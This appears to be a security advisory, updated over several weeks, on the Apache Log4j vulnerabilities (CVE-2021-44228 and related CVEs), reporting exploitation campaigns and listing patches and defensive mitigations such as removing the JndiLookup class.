Critical Zero-Day Vulnerability in Apache Log4j Java Library: CVE-2021-44228

Summary UPDATE, 31 January 2022 Researchers recently published a blog detailing suspected active exploitation of Unifi Network applications. The first observed successful exploitation was on 20 January 2022; a proof-of-concept (PoC) for this exploit was released on 24 December 2021. These attacks are similar to those that the same researchers detailed targeting VMWare Horizon leveraging the Log4j vulnerability, CVE-2022-44228. However, researchers note that these attacks are unique in that the command-and-control (C2) used was the same as was used in the SolarWind supply chain attack , Cobalt beacon C2, and has been attributed to TA505 aka GRACEFUL SPIDER, a well-known financially motivated threat group. UPDATE, 28 December 2021 A fifth vulnerability related to Log4j has recently been disclosed. CVE-2021-44832 is an RCE vulnerability with a moderate severity rating (CVSS: 6.6) and is due to the lack of additional controls on JDNI access in Log4j. This vulnerability affects all versions from 2.0-alpha7 to 2.17.0, excluding 2.3.2 and 2.12.4. Apache has released version 2.17.1 to remediate. Users are encouraged to update this latest version after appropriate testing is completed. UPDATE, 27 December 2021 CISA, along with other security organizations, recently released scanners to identify Log4j vulnerabilities. The open-source tool is derived from scanners created by other members of the security community and is designed to help organizations determine if they have vulnerable web services affected by the critical Log4j vulnerabilities. This scanner is located on CISA's public Github repository , and scans for two major Log4j vulnerabilities, tracked as CVE-2021-44228 and CVE-2021-45046. CISA stated that this scanner supports DNS callback for vulnerability discovery and validation as well. UPDATE, 22 December 2021 Today the CISA, FBI, NSA, Australian Cyber Security Centre (ACSC), Canadian Centre for Cyber Security (CCCS), the Computer Emergency Response Team New Zealand (CERT NZ), the New Zealand National Cyber Security Centre (NZ NCSC), and the United Kingdom’s National Cyber Security Centre (NCSC-UK) released a joint alert to provide additional guidance in mitigating vulnerabilities pertaining to Apache’s Log4j software library. This alert expands on previously published guidance by "detailing steps that vendors and organizations with IT and/or cloud assets should take to reduce the risk posed by these vulnerabilities." These steps include: Identifying assets affected by Log4Shell and other Log4j-related vulnerabilities Upgrading Log4j assets and affected products to the latest version as soon as patches are available and remaining alert to vendor software updates Initiating hunt and incident response procedures to detect possible Log4Shell exploitation. This alert also provides additional guidance for affected organizations with operational technology (OT)/industrial control systems (ICS) assets. UPDATE, 21 December 2021 It has been recently discovered that the Log4j vulnerability is now being exploited to infect Windows devices with the Dridex banking Trojan and Linux devices with Meterpreter. Researchers state that threat actors use the Log4j RMI (Remote Method Invocation) exploit variant to force vulnerable devices to load and execute a Java class from an attacker-controlled remote server. Successful execution allows installation of the Dridex Trojan or Meterpreter once the targeted device is identified as running Windows or Linux. Dridex is known for targeting online banking users to steal their credentials. More recent variants of Dridex have additional capabilities such as conducting surveillance activities, uploading additional malware, and propagating to other devices. Successful deployment of either Dridex or Meterpreter could allow attackers to deploy further payloads or remotely execute commands on an affected device. UPDATE, 20 December 2021 Another vulnerability in Log4j has been identified. CVE-2021-45105 , rated as high severity (CVSS: 7.5), could allow an attacker with control over Thread Context Map data to cause a DoS condition. While not exploiting the same vulnerability as the initial Log4j vulnerability, CVE-2021-45105 uses Context Map lookups rather than the JNDI lookups to an LDAP server that allows attackers to execute any code that’s returned in the Log4Shell vulnerability. This vulnerability affects all versions of the tool from 2.0-beta9 to 2.16, but only appears to affect non-default configurations. Apache released its newest update, 2.17.0 , to mitigate the newest vulnerabilities. UPDATE, 17 December 2021 New details regarding Log4j continue to emerge. Two additional vulnerabilities addressing Log4j have been observed and detailed. As of the time of this writing, there are four vulnerabilities associated with Log4j (also known as LogJam and Log4Shell): CVE-2021-44228 is the original Log4j vulnerability, rated as critical (CVSS: 10.0) CVE-2021-45046 is a Denial of Service (DoS) vulnerability. Previously considered a low severity vulnerability (CVSS: 3.7), CVE-2021-45046 has been recently updated as critical (CVSS: 9.0) CVE-2021-4104 affects the non-default configurations of Log4j 1.x instances and is considered a high severity vulnerability (CVSS: 8.1) CVE-2021-42550 is a vulnerability in the Logback logging framework, a successor to the Log4j 1.x library and is rated as medium severity (CVSS: 6.6) Researchers strongly recommend updating to version 2.16.0, and organizations are urged to continue to monitor Apache's Log4j advisory page for updates. In addition, CISA today issued an emergency directive directing federal civilian executive branch (FCEB) agencies to address Log4j vulnerabilities. While the CISA Emergency Directive applies directly to federal civilian executive branch agencies, it does demonstrate the level of attention CISA is placing on these vulnerabilities and their recommended mitigating actions. For additional details, see CISA’s webpage Apache Log4j Vulnerability Guidance . New studies also show that attackers - from cybercriminals, including newly identified Conti ransomware actors targeting VMWare servers, to nation-state actors - have attempted to exploit log4j vulnerabilities on almost half of global networks. UPDATE, 15 December 2021 A second vulnerability in Log4j was recently discovered. Tracked as CVE-2021-45046 with a CVSS score of 3.7, this vulnerability affects all versions of Log4j through version 2.15.0. Apache has released version 2.16.0 in response; it is now recommended organizations apply the latest patch version 2.16.0, as version 2.15.0 was deemed incomplete. Apache stated in this latest advisory that the incomplete patch for CVE-2021-44228 could be abused to "craft malicious input data using a JNDI Lookup pattern resulting in a denial-of-service (DoS) attack." UPDATE, 14 December 2021 CISA states that they, along with partners, are tracking and responding to the active, widespread exploitation of this critical RCE vulnerability, thought to potentially affect millions of organizations and hundreds of millions of devices across a variety of enterprises and industries. As a result, CISA created a website devoted to guidance related to the Log4j vulnerability. This website will be actively maintained with a community-sourced GitHub repository of publicly available information and vendor-supplied advisories. Of note, Log4j is now being viewed as 'fully weaponized' and being actively exploited by what at least two security firms suggest are Chinese government hacking groups. UPDATE, 13 December 2021 Additional details continue to roll in on the critical zero-day vulnerability affecting several versions of Apache’s Log4j, CVE-2021-44228. Over the weekend, researchers published a blog detailing their observations on how attackers are attempting to exploit this vulnerability, including variations in attack methods and obfuscation methods in attempts to hide within ‘normal’ network traffic. Additional research shows that CVE-2021-44228 is being leveraged to form new botnets. Two have been identified – a Muhstik botnet and a Mirai botnet – both being used to target Linux devices. In addition, coin miners are now attempting to exploit this vulnerability for their purposes. In fact, mass scanning attempts aiming to deploy coin miners or malware for building botnets have been observed. This could be considered 'sophisticated activity,' potentially from an advanced persistent threat (APT) actor or a state-sponsored actor. Again, Apache has released Log4j version 2.15 which contains a fix for this CVE. It is recommended to immediately upgrade to this version once appropriate testing has been completed in your environment. Researchers recommend that, if your organization is unable to apply the patches, you can mitigate this vulnerability as follows: For versions 2.0 and before 2.10, Apache recommends removing the Jndi Lookup class from the classpath by running: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class For versions 2.10 and above, set the system property formatMsgNoLookups to true or set the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true. If you cannot do any of the above, you can block all outbound LDAP or RMI connections using Application Identity filters. Juniper SRX NG Firewall provides AppID signatures for both protocols. Some researchers also recommend web application firewalls (WAF) - though these are not considered foolproof - as well as outbound egress filtering and allow listing. Indicators of Compromised (IoCs) and additional mitigation recommendations are available at the research sites mentioned above. In addition, further details regarding known vulnerable software are availble here , and details regarding exploitation detection are available here . Original Content Apache recently released a security advisory to address a vulnerability in its Log4j Java library, an open source logging utility that's used in countless apps, including those used by large enterprise organizations and cloud services. A remote code execution (RCE) vulnerability that does not require authentication, CVE-2021-44228 , dubbed Log4Shell or LogJam, affects Log4j versions 2.0-beta9 to 2.14.1. This vulnerability is considered critical and has been assigned a CVSS score of 10.0. A remote attacker could exploit this vulnerability to take control of an affected system. Researchers initially reported this vulnerability to Apache on November 24, indicating that CVE-2021-44228 also impacts default configurations of multiple Apache frameworks, including Apache Struts2, Apache Solr, Apache Druid, Apache Flink, and others. A proof-of-concept (PoC) exploit was published on GitHub yesterday; threat actors immediately began scanning the internet for vulnerable hosts and networks. Along with Apache and the US CISA, New Zealand Computer Emergency Response Team (CERT NZ) issued a security advisory warning of active exploitation in the wild. Further, other researchers believe that "Similarly to other high-profile vulnerabilities such as Heartbleed and Shellshock, we believe there will be an increasing number of vulnerable products discovered in the weeks to come." It is likely that many threat actors, to include ransomware actors, will begin leveraging this vulnerability immediately. Analysis Affected Versions This vulnerability impacts Log4j versions 2.0-beta9 to 2.14.1, as well as default configurations of multiple Apache frameworks, including Apache Struts2, Apache Solr, Apache Druid, and Apache Flink. Potential Impact Successful exploitation of this vulnerability could allow complete system takeover on vulnerable systems. Recommendations Apache released an update to address this vulnerability. CISA encourages users and administrators to review the Apache Log4j 2.15.0 Announcement and upgrade to Log4j 2.15.0 or apply the recommended mitigations immediately. References https://nvd.nist.gov/vuln/detail/CVE-2021-44228 https://logging.apache.org/log4j/2.x/security.html https://www.cyberkendra.com/2021/12/worst-log4j-rce-zeroday-dropped-on.html https://www.cert.govt.nz/it-specialists/advisories/log4j-rce-0-day-actively-exploited/ https://protect-eu.mimecast.com/s/7LIkCWnxXIDKZWo5HxkFaf?domain=mail-archives.us.apache.org https://github.com/tangxiaofeng7/apache-log4j-poc https://blogs.juniper.net/en-us/enterprise-cloud-and-transformation/apache-log4j-vulnerability-cve-2021-44228-raises-widespread-concerns https://blog.netlab.360.com/threat-alert-log4j-vulnerability-has-been-adopted-by-two-linux-botnets/ https://isc.sans.edu/forums/diary/Log4Shell+exploited+to+implant+coin+miners/28124/ https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b https://github.com/NCSC-NL/log4shell/tree/main/software https://www.govinfosecurity.com/serious-log4j-security-flaw-race-underway-to-discern-scope-a-18107 https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance https://github.com/cisagov/log4j-affected-db https://nvd.nist.gov/vuln/detail/CVE-2021-45046 https://www.zdnet.com/article/log4j-flaw-nearly-half-of-corporate-networks-have-been-targeted-by-attackers-trying-to-use-this-vulnerability/#ftag=RSSbaffb68 https://nvd.nist.gov/vuln/detail/CVE-2021-42550 https://nvd.nist.gov/vuln/detail/CVE-2021-4104 https://www.cisa.gov/emergency-directive-22-02 https://www.bleepingcomputer.com/news/security/conti-ransomware-uses-log4j-bug-to-hack-vmware-vcenter-servers/ https://nvd.nist.gov/vuln/detail/CVE-2021-45105 https://logging.apache.org/log4j/2.x/download.html https://heimdalsecurity.com/blog/dridex-malware-installed-with-the-help-of-log4j-vulnerability/ https://www.cisa.gov/uscert/ncas/alerts/aa21-356a https://github.com/cisagov/log4j-scanner https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832 https://blog.morphisec.com/log4j-exploit-targets-vulnerable-unifi-network-applications https://blog.morphisec.com/log4j-exploit-hits-again-vulnerable-vmware-horizon-servers-at-risk https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-solarwinds-serv-u-exploit-campaign/